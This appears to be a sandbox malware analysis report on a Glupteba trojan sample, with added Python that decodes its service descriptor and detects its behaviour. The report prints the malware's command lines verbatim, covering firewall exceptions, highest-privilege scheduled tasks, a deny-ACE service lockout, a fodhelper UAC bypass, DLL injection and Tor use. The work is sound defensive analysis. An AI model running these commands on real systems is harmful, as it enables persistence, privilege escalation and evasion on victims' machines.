

Windows Analysis Report
kdsyitkxmS.exe

Overview

General Information

Sample Name: kdsyitkxmS.exe
Analysis ID: 877005
MD5: 01fe6ba28d82175d35665b3eb6ed8cea
SHA1: 45748a6d6474f470d44e848596e0e08bce674996
SHA256: 626df082c2624d9530794881921094aa100fa0a805b1544112d5a07dbe12cbc2

Detection

Glupteba
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected Glupteba
Detected unpacking (changes PE section rights)
Antivirus detection for URL or domain
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Uses netsh to modify the Windows network and firewall settings
Found Tor onion address
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses shutdown.exe to shutdown or reboot the system
Machine Learning detection for sample
Creates files in the system32 config directory
Modifies the windows firewall
Performs DNS TXT record lookups
Drops executables to the windows directory (C:\Windows) and starts them
Uses schtasks.exe or at.exe to add and modify task schedules
Uses STUN server to do NAT traversal
Drops PE files with benign system names
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Sample execution stops while process was sleeping (likely an evasion)
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Contains capabilities to detect virtual machines
Enables security privileges
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64native
  • svchost.exe (PID: 7872 cmdline: C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc MD5: F586835082F632DC8D9404D83BC16316)
  • kdsyitkxmS.exe (PID: 4688 cmdline: C:\Users\user\Desktop\kdsyitkxmS.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • powershell.exe (PID: 8304 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8312 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • kdsyitkxmS.exe (PID: 8716 cmdline: C:\Users\user\Desktop\kdsyitkxmS.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
      • powershell.exe (PID: 8848 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 9108 cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 9116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • netsh.exe (PID: 9168 cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes MD5: 6F1E6DD688818BC3D1391D0CC7D597EB)
      • powershell.exe (PID: 9200 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 9208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • powershell.exe (PID: 8380 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 8556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • csrss.exe (PID: 2532 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
        • powershell.exe (PID: 5432 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 1388 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 5008 cmdline: schtasks /delete /tn ScheduledUpdate /f MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 5868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 2372 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 6864 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • powershell.exe (PID: 2736 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 1448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 7316 cmdline: mountvol B: /s MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 5316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 7668 cmdline: mountvol B: /d MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 8296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 1096 cmdline: mountvol B: /s MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 8644 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • mountvol.exe (PID: 4896 cmdline: mountvol B: /d MD5: E0B3FFF7584298E77DFFB50796839FED)
          • conhost.exe (PID: 3560 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • injector.exe (PID: 5412 cmdline: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\user\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll MD5: D98E33B66343E7C96158444127A117F6)
          • conhost.exe (PID: 2900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • shutdown.exe (PID: 5092 cmdline: shutdown -r -t 5 MD5: FCDE5AF99B82AE6137FB90C7571D40C3)
          • conhost.exe (PID: 3308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 9044 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 9052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • cmd.exe (PID: 7312 cmdline: cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5480 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • sc.exe (PID: 8944 cmdline: sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD) MD5: D9D7684B8431A0D10D0E76FE9F5FFEC8)
        • proxy.exe (PID: 4736 cmdline: C:\Users\user\AppData\Local\Temp\csrss\proxy\proxy.exe -bind-address 127.0.0.1:31466 MD5: 61275FE567B258A897943911C450E57E)
          • conhost.exe (PID: 6076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 8044 cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F MD5: 796B784E98008854C27F4B18D287BA30)
          • conhost.exe (PID: 4164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • TrustedInstaller.exe (PID: 8676 cmdline: C:\Windows\servicing\TrustedInstaller.exe MD5: F14D860CAE05DBD10671623C76B5DE65)
  • csrss.exe (PID: 768 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • cmd.exe (PID: 5000 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • fodhelper.exe (PID: 3488 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 3460 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 4112 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • csrss.exe (PID: 7048 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
          • powershell.exe (PID: 7932 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • csrss.exe (PID: 6892 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
            • powershell.exe (PID: 6628 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 6400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • csrss.exe (PID: 8952 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • powershell.exe (PID: 8904 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 8896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • csrss.exe (PID: 8552 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
      • powershell.exe (PID: 1356 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 680 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • csrss.exe (PID: 9120 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
    • cmd.exe (PID: 7108 cmdline: C:\Windows\Sysnative\cmd.exe /C fodhelper MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • fodhelper.exe (PID: 7384 cmdline: fodhelper MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 8408 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
      • fodhelper.exe (PID: 8324 cmdline: "C:\Windows\system32\fodhelper.exe" MD5: 85018BE1FD913656BC9FF541F017EACD)
        • csrss.exe (PID: 7120 cmdline: "C:\Windows\rss\csrss.exe" MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
          • powershell.exe (PID: 5632 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
            • conhost.exe (PID: 6536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
          • csrss.exe (PID: 4840 cmdline: C:\Windows\rss\csrss.exe MD5: 01FE6BA28D82175D35665B3EB6ED8CEA)
            • powershell.exe (PID: 2332 cmdline: powershell -nologo -noprofile MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
              • conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
  • tor.exe (PID: 6028 cmdline: C:\Users\user\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\user\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\user\AppData\Local\Temp\csrss\tor\log.txt MD5: 055AE7C584A7B012955BF5D874F30CFA)
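The `sc sdset WmiPrvSE D:(A;;...)` command in the tree above rewrites the security descriptor of the WMI Provider Host service, and the SDDL string is dense enough that its effect is easy to misread. As an added example (not code from the Joe Sandbox report or from Joe Security), the following Python decodes that exact string into its ACEs and computes what each trustee can still do to the service. The two-letter right codes follow Microsoft's documented abbreviations for service objects; the trustee display names, the `describe` summary, and the decision to ignore group membership are this example's own assumptions.

```python
"""Decode a service SDDL string such as the one passed to `sc sdset WmiPrvSE ...`
in this report, and compute what each trustee can still do to the service."""
import re
from dataclasses import dataclass

# The exact security descriptor from the report's sc.exe command line.
WMIPRVSE_SDDL = (
    "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
    "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
)

# Two-letter access-right codes as Windows uses them for service objects.
RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP", "DT": "SERVICE_PAUSE_CONTINUE",
    "LO": "SERVICE_INTERROGATE", "CR": "SERVICE_USER_DEFINED_CONTROL",
    "SD": "DELETE", "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
    "GA": "GENERIC_ALL", "GR": "GENERIC_READ", "GW": "GENERIC_WRITE", "GX": "GENERIC_EXECUTE",
}
ACE_TYPES = {"A": "ALLOW", "D": "DENY", "AU": "AUDIT"}
# Display names for the SID aliases seen in this descriptor (assumed labels for output only).
TRUSTEES = {"SY": "NT AUTHORITY\\SYSTEM", "BA": "BUILTIN\\Administrators",
            "IU": "Interactive users", "SU": "Service logon users", "WD": "Everyone"}


@dataclass(frozen=True)
class Ace:
    acl: str            # "D" for the DACL, "S" for the SACL
    ace_type: str       # ALLOW / DENY / AUDIT
    flags: str          # ACE flags, e.g. "FA" = audit failed access
    rights: frozenset   # expanded right names
    trustee: str        # SID alias or literal SID string


def _expand_rights(code):
    """Turn 'WPDT' into {'SERVICE_STOP', 'SERVICE_PAUSE_CONTINUE'}; hex masks are kept verbatim."""
    if code.startswith("0x"):
        return frozenset([code])
    if len(code) % 2:
        raise ValueError(f"odd-length rights string: {code!r}")
    return frozenset(RIGHTS.get(code[i:i + 2], code[i:i + 2]) for i in range(0, len(code), 2))


def parse_sddl(sddl):
    """Return the ACEs of the DACL and SACL in the order they appear in the string."""
    aces = []
    for acl, _flags, body in re.findall(r"([DS]):([^(]*)((?:\([^)]*\))*)", sddl):
        for ace in re.findall(r"\(([^)]*)\)", body):
            fields = ace.split(";")
            if len(fields) != 6:
                raise ValueError(f"malformed ACE: ({ace})")
            ace_type, flags, rights, _obj, _inherit, trustee = fields
            aces.append(Ace(acl, ACE_TYPES.get(ace_type, ace_type), flags,
                            _expand_rights(rights), trustee))
    return aces


def denied_rights(aces, trustee):
    """Union of the rights that DENY ACEs in the DACL take away from this trustee."""
    return set().union(*(a.rights for a in aces
                         if a.acl == "D" and a.ace_type == "DENY" and a.trustee == trustee))


def effective_rights(aces, trustee):
    """Allowed minus denied for ACEs naming this trustee directly.
    Simplification: group membership (an admin who is also an interactive user) is not resolved."""
    allowed = set().union(*(a.rights for a in aces
                            if a.acl == "D" and a.ace_type == "ALLOW" and a.trustee == trustee))
    return allowed - denied_rights(aces, trustee)


def describe(sddl):
    """One human-readable line per trustee named in the DACL."""
    aces = parse_sddl(sddl)
    lines = []
    for trustee in sorted({a.trustee for a in aces if a.acl == "D"}):
        eff = effective_rights(aces, trustee)
        denied = denied_rights(aces, trustee)
        line = f"{TRUSTEES.get(trustee, trustee)}: {len(eff)} rights"
        if denied:
            line += "; explicitly denied " + ", ".join(sorted(denied))
        if "WRITE_DAC" in eff:
            line += " (still holds WRITE_DAC, so it can rewrite this descriptor)"
        lines.append(line)
    return lines


if __name__ == "__main__":
    for line in describe(WMIPRVSE_SDDL):
        print(line)
```

Decoded, the descriptor lets SYSTEM start, stop and pause the service, grants Administrators configuration, delete and DACL-write rights but no SERVICE_STOP or SERVICE_PAUSE_CONTINUE, and then adds an explicit deny of those two rights for Administrators, so an elevated `sc stop WmiPrvSE` or `Stop-Service` fails with access denied while the process itself keeps running. The deny is only as strong as the rights left behind: Administrators still hold WRITE_DAC, so an incident responder can restore a sane descriptor with another `sc sdset` and then stop the service. The SACL entry audits failed access by Everyone across all rights.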
Name: Glupteba
Description: Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.glupteba
No configs have been found
Source | Rule | Description | Author | Strings
0000002B.00000003.208864091925.0000000004141000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
00000017.00000003.208782822555.0000000004141000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
0000001F.00000003.208814614113.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth (Nextron Systems)
  • 0x3b7997:$x1: https://cdn.discordapp.com/attachments/
0000001F.00000003.208814614113.0000000004141000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Glupteba | Yara detected Glupteba | Joe Security
0000002B.00000003.208864091925.0000000003D00000.00000004.00001000.00020000.00000000.sdmp | SUSP_PE_Discord_Attachment_Oct21_1 | Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN) | Florian Roth (Nextron Systems)
  • 0x3b7997:$x1: https://cdn.discordapp.com/attachments/
Source | Rule | Description | Author | Strings
58.3.csrss.exe.4331420.6.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth (Nextron Systems)
  • 0x29b38:$s2: The Magic Word!
  • 0x35c78:$s2: The Magic Word!
  • 0x29e98:$s3: Software\Oracle\VirtualBox
  • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
61.3.csrss.exe.4331420.0.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth (Nextron Systems)
  • 0x29b38:$s2: The Magic Word!
  • 0x35c78:$s2: The Magic Word!
  • 0x29e98:$s3: Software\Oracle\VirtualBox
  • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
10.3.kdsyitkxmS.exe.40e1420.6.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth (Nextron Systems)
  • 0x29b38:$s2: The Magic Word!
  • 0x35c78:$s2: The Magic Word!
  • 0x29e98:$s3: Software\Oracle\VirtualBox
  • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
23.3.csrss.exe.4331420.1.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth (Nextron Systems)
  • 0x29b38:$s2: The Magic Word!
  • 0x35c78:$s2: The Magic Word!
  • 0x29e98:$s3: Software\Oracle\VirtualBox
  • 0x29b27:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73
31.3.csrss.exe.431bb00.3.raw.unpack | MAL_ME_RawDisk_Agent_Jan20_2 | Detects suspicious malware using ElRawDisk | Florian Roth (Nextron Systems)
  • 0x3f458:$s2: The Magic Word!
  • 0x4b598:$s2: The Magic Word!
  • 0x3f7b8:$s3: Software\Oracle\VirtualBox
  • 0x3f447:$sc1: 00 5C 00 5C 00 2E 00 5C 00 25 00 73

        Persistence and Installation Behavior

Source: Process started
Author: Joe Security
Data: Command: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Windows\rss\csrss.exe, ParentImage: C:\Windows\rss\csrss.exe, ParentProcessId: 2532, ParentProcessName: csrss.exe, ProcessCommandLine: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F, ProcessId: 1388, ProcessName: schtasks.exe
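The Sigma hit above covers only the scheduled task, but the process tree shows four more living-off-the-land steps that the same process-creation telemetry exposes: the `netsh advfirewall` exception for `C:\Windows\rss\csrss.exe`, the `sc sdset` rewrite with a deny ACE, `fodhelper.exe` (an auto-elevating binary) spawning a non-system executable, and a binary named `csrss.exe` running outside System32. As an added example (not part of the Joe Sandbox report, and not Joe Security's or the Sigma project's rule code), the following Python encodes those five patterns as detection functions and runs them over constructed process-creation events modelled on the tree. The `ProcEvent` shape, the path heuristics in `_suspicious_path`, the list of system binary names, and the two benign control events are this example's own assumptions.

```python
"""Process-creation detection logic for the living-off-the-land steps seen in this
report's process tree: schtasks persistence with highest run level, a netsh firewall
exception, a child of the auto-elevating fodhelper.exe, a service security descriptor
rewritten with a deny ACE, and a system binary name running outside System32."""
import re
from dataclasses import dataclass

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Names that legitimately live only in System32 (assumed list for this example).
SYSTEM_NAMES = {"csrss.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "services.exe"}


@dataclass(frozen=True)
class ProcEvent:
    image: str          # full path of the started process
    cmdline: str        # its command line
    parent_image: str   # full path of the parent process


def _base(path):
    return path.lower().rsplit("\\", 1)[-1]


def _in_system_dir(path):
    return path.lower().startswith(SYSTEM_DIRS)


def _suspicious_path(path):
    """Heuristic assumed by this example: below the Windows directory but outside
    System32/SysWOW64, or anywhere below an AppData or Temp directory."""
    p = path.lower()
    under_windows = p.startswith("c:\\windows\\") and not _in_system_dir(p)
    return under_windows or "\\appdata\\" in p or "\\temp\\" in p


def _value(cmdline, key):
    """Value that follows the regex `key` (e.g. a /TR switch or program=), honouring quotes."""
    m = re.search(key + r'("([^"]*)"|(\S+))', cmdline, re.I)
    if not m:
        return None
    return m.group(2) if m.group(2) is not None else m.group(3)


def rule_schtasks_persistence(ev):
    c = ev.cmdline.lower()
    if _base(ev.image) != "schtasks.exe" or "/create" not in c:
        return None
    target = _value(ev.cmdline, r"/tr\s+")
    name = _value(ev.cmdline, r"/tn\s+")
    if target and "/rl highest" in c and _suspicious_path(target):
        return f"task {name!r} runs {target} with highest privileges"
    return None


def rule_firewall_allow(ev):
    c = ev.cmdline.lower()
    if _base(ev.image) != "netsh.exe" or "add rule" not in c or "action=allow" not in c:
        return None
    program = _value(ev.cmdline, r"program=")
    name = _value(ev.cmdline, r"name=")
    direction = _value(ev.cmdline, r"dir=")
    if program and _suspicious_path(program):
        return f"firewall rule {name!r} allows dir={direction} for {program}"
    return None


def rule_fodhelper_child(ev):
    # fodhelper.exe auto-elevates; it has no business launching code outside System32.
    if _base(ev.parent_image) == "fodhelper.exe" and not _in_system_dir(ev.image):
        return f"auto-elevating fodhelper.exe spawned {ev.image}"
    return None


def rule_service_deny_ace(ev):
    c = ev.cmdline.lower()
    if _base(ev.image) == "sc.exe" and "sdset" in c and "(d;" in c:
        service = c.split("sdset", 1)[1].split()[0]
        return f"security descriptor of service {service!r} rewritten with a deny ACE"
    return None


def rule_masquerade(ev):
    name = _base(ev.image)
    if name in SYSTEM_NAMES and not _in_system_dir(ev.image):
        return f"{name} running from {ev.image}, not from System32"
    return None


RULES = (rule_schtasks_persistence, rule_firewall_allow, rule_fodhelper_child,
         rule_service_deny_ace, rule_masquerade)


def detect(events):
    """Return (rule name, message) pairs for every rule that fires on every event."""
    findings = []
    for ev in events:
        for rule in RULES:
            msg = rule(ev)
            if msg:
                findings.append((rule.__name__, msg))
    return findings


# Constructed events modelled on the report's process tree (not captured telemetry).
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F',
              r"C:\Windows\rss\csrss.exe"),
    ProcEvent(r"C:\Windows\System32\netsh.exe",
              r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\sc.exe",
              "sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)"
              "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\rss\csrss.exe", r'"C:\Windows\rss\csrss.exe"',
              r"C:\Windows\System32\fodhelper.exe"),
    # Two benign controls that must stay silent: a real svchost and a task targeting System32.
    ProcEvent(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc",
              r"C:\Windows\System32\services.exe"),
    ProcEvent(r"C:\Windows\System32\schtasks.exe",
              r'schtasks /CREATE /SC DAILY /RL HIGHEST /TR "C:\Windows\System32\cleanmgr.exe" /TN Cleanup',
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for rule_name, message in detect(SAMPLE_EVENTS):
        print(f"[{rule_name}] {message}")
```

The fourth event fires twice on purpose: the same `csrss.exe` launch is both a child of `fodhelper.exe` and a system name running from `C:\Windows\rss`, and either signal alone is worth an alert. The path heuristic deliberately treats the whole Windows directory outside System32 and SysWOW64 as suspicious for highest-privilege tasks and firewall exceptions, which is exactly the gap this sample uses; tune `SYSTEM_NAMES` and `_suspicious_path` to the estate before deploying anything like it.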
Snort IDS Alerts

Timestamp: 05/28/23-11:32:14.790696
Source IP: 192.168.11.20
Destination IP: 1.1.1.1
SID: 2045697
Source Port: 49827
Destination Port: 53
Protocol: UDP
Classtype: A Network Trojan was detected

Timestamp: 05/28/23-11:34:14.938480
Source IP: 192.168.11.20
Destination IP: 185.82.216.50
SID: 2043048
Source Port: 50007
Destination Port: 443
Protocol: TCP
Classtype: A Network Trojan was detected

Timestamp: 05/28/23-11:37:15.634598
Source IP: 192.168.11.20
Destination IP: 1.1.1.1
SID: 2045697
Source Port: 63997
Destination Port: 53
